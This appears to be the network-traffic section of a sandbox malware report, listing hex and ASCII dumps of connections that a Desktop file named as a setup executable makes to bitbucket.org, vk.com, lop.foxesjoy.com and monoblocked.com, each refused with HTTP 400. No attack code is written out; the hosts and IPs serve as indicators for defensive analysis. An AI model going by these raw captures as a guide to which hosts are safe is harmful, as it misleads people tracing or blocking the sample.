Jul 2, 2024 00:05:06.447371006 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:06 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49720	104.192.141.1	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:05.754060030 CEST	171	OUT	Data Raw: 16 03 03 00 a6 01 00 00 a2 03 03 66 83 28 11 c0 98 de f1 56 ea e9 80 bc 80 dc 7a 40 20 ea 99 55 79 c6 cc b6 32 82 fc 5e 50 5b 7a 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f(Vz@ Uy2^P[z&,+0/$#('=<5/Sbitbucket.org#
Jul 2, 2024 00:05:06.235733986 CEST	89	IN	HTTP/1.0 400 Bad request Content-Type: text/html Data Raw: 3c 68 32 3e 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 20 62 61 64 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a Data Ascii: <h2>Client sent a bad request.</h2>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49721	188.114.96.3	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:05.785846949 CEST	174	OUT	Data Raw: 16 03 03 00 a9 01 00 00 a5 03 03 66 83 28 11 a3 92 82 2e 44 bd 4a d9 9f 09 66 e6 4f 39 c1 c8 de 4e bf a0 7d c1 bc a6 a7 2d 59 a9 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f(.DJfO9N}-Y&,+0/$#('=<5/Vlop.foxesjoy.com#
Jul 2, 2024 00:05:06.251404047 CEST	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Mon, 01 Jul 2024 22:05:06 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49722	45.130.41.108	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:05.896136999 CEST	173	OUT	Data Raw: 16 03 03 00 a8 01 00 00 a4 03 03 66 83 28 11 ed d0 79 68 de 20 d4 4d 89 92 ce d6 7f 9d 81 d4 67 68 1d 4e d1 f7 f3 30 95 fb a3 94 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f(yh MghN0&,+0/$#('=<5/Umonoblocked.com#
Jul 2, 2024 00:05:06.599900961 CEST	329	IN	HTTP/1.1 400 Bad Request Server: nginx-reuseport/1.21.1 Date: Mon, 01 Jul 2024 22:05:06 GMT Content-Type: text/html Content-Length: 167 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2d 72 65 75 73 65 70 6f 72 74 2f 31 2e 32 31 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx-reuseport/1.21.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49723	104.192.141.1	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:06.241756916 CEST	117	OUT	Data Raw: 16 03 01 00 70 01 00 00 6c 03 01 66 83 28 11 03 c6 a2 6e 7e bb bd b5 4b 17 11 90 12 68 0f 94 ea 26 77 8b b2 8e dd 99 a9 94 6e 4e 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 35 00 00 00 12 00 10 00 00 0d 62 69 74 62 75 63 6b 65 74 Data Ascii: plf(n~Kh&wnN5/5bitbucket.org#
Jul 2, 2024 00:05:06.730102062 CEST	89	IN	HTTP/1.0 400 Bad request Content-Type: text/html Data Raw: 3c 68 32 3e 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 20 62 61 64 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a Data Ascii: <h2>Client sent a bad request.</h2>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49724	188.114.96.3	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:06.257030964 CEST	120	OUT	Data Raw: 16 03 01 00 73 01 00 00 6f 03 01 66 83 28 11 0f 20 f4 d5 20 8b 2c 30 91 7e f9 1f cd cf 87 28 36 d5 19 1f 8b b3 b2 f2 e3 00 9d 2e 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 38 00 00 00 15 00 13 00 00 10 6c 6f 70 2e 66 6f 78 65 73 Data Ascii: sof( ,0~(6.5/8lop.foxesjoy.com#
Jul 2, 2024 00:05:06.712171078 CEST	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Mon, 01 Jul 2024 22:05:06 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49725	87.240.132.78	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:06.453429937 CEST	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 83 28 11 b4 0a 3a ff ab 0b 9d 1b 02 8a bd 2c 08 b0 d8 97 a7 94 87 f5 82 a4 74 8e 34 c1 d1 7d 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f(:,t4}&,+0/$#('=<5/Lvk.com#
Jul 2, 2024 00:05:08.001463890 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:07 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>
Jul 2, 2024 00:05:08.002932072 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:07 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>
Jul 2, 2024 00:05:08.003022909 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:07 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49726	87.240.132.78	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:06.454042912 CEST	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 83 28 11 f4 7c ad 78 76 e0 f3 30 55 8c 30 14 60 29 fd 99 4e a2 49 5c 05 61 29 3a 0a ee 20 d8 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f(\|xv0U0`)NI\a): &,+0/$#('=<5/Lvk.com#
Jul 2, 2024 00:05:08.002233028 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:07 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>
Jul 2, 2024 00:05:08.002939939 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:07 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>
Jul 2, 2024 00:05:08.003032923 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:07 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49728	45.130.41.108	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:06.605696917 CEST	119	OUT	Data Raw: 16 03 01 00 72 01 00 00 6e 03 01 66 83 28 11 a1 a3 5d 48 e6 87 42 77 9d c9 d3 ae c0 cd e3 c6 7c 6f a4 96 ca 17 8d a2 53 d8 0a a8 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 37 00 00 00 14 00 12 00 00 0f 6d 6f 6e 6f 62 6c 6f 63 6b Data Ascii: rnf(]HBw\|oS5/7monoblocked.com#
Jul 2, 2024 00:05:08.002904892 CEST	329	IN	HTTP/1.1 400 Bad Request Server: nginx-reuseport/1.21.1 Date: Mon, 01 Jul 2024 22:05:07 GMT Content-Type: text/html Content-Length: 167 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2d 72 65 75 73 65 70 6f 72 74 2f 31 2e 32 31 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx-reuseport/1.21.1</center></body></html>
Jul 2, 2024 00:05:08.002964973 CEST	329	IN	HTTP/1.1 400 Bad Request Server: nginx-reuseport/1.21.1 Date: Mon, 01 Jul 2024 22:05:07 GMT Content-Type: text/html Content-Length: 167 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2d 72 65 75 73 65 70 6f 72 74 2f 31 2e 32 31 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx-reuseport/1.21.1</center></body></html>
Jul 2, 2024 00:05:08.003065109 CEST	329	IN	HTTP/1.1 400 Bad Request Server: nginx-reuseport/1.21.1 Date: Mon, 01 Jul 2024 22:05:07 GMT Content-Type: text/html Content-Length: 167 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2d 72 65 75 73 65 70 6f 72 74 2f 31 2e 32 31 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx-reuseport/1.21.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49733	87.240.132.78	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:08.089780092 CEST	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 83 28 13 a6 c1 80 84 75 fe 6c 7d a0 5c 9f 8c 47 c9 aa 9b 73 dd ec f4 eb 23 09 95 39 e1 c2 d5 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f(ul}\Gs#9&,+0/$#('=<5/Lvk.com#
Jul 2, 2024 00:05:08.702200890 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:08 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49734	87.240.132.78	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:08.123485088 CEST	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 83 28 13 f8 47 f0 24 ee 8e 16 b7 27 8b 9a ec 89 12 2e 2e a7 0c 82 ce 78 7d 5d 82 ce a6 47 77 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: ief(G$'..x}]Gw5/.vk.com#
Jul 2, 2024 00:05:08.816194057 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:08 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49738	87.240.132.78	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:08.764592886 CEST	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 83 28 14 41 8a e8 3e 96 92 a8 a0 e1 d0 75 02 e7 97 bd dd c2 23 74 91 14 49 b9 e5 7c 6c 80 1b 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: ief(A>u#tI\|l5/.vk.com#
Jul 2, 2024 00:05:09.428669930 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:09 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49739	87.240.132.78	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:09.016922951 CEST	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 83 28 14 ad 58 1e 0b 0e b3 95 4e 06 17 6c e4 a2 1e 1f 7b 17 ee 1c 03 14 3f 3b b3 e8 c2 3d a2 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: ief(XNl{?;=5/.vk.com#
Jul 2, 2024 00:05:09.536021948 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Mon, 01 Jul 2024 22:05:09 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49741	87.240.132.78	80	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:09.439074993 CEST	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 83 28 14 02 6b 7f a9 cc 7d c9 9b 3d 54 1a ef 1b 1d 70 ad 73 26 e9 c7 b2 d3 59 c4 94 84 ce 50 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: ief(k}=Tps&YP5/.vk.com#
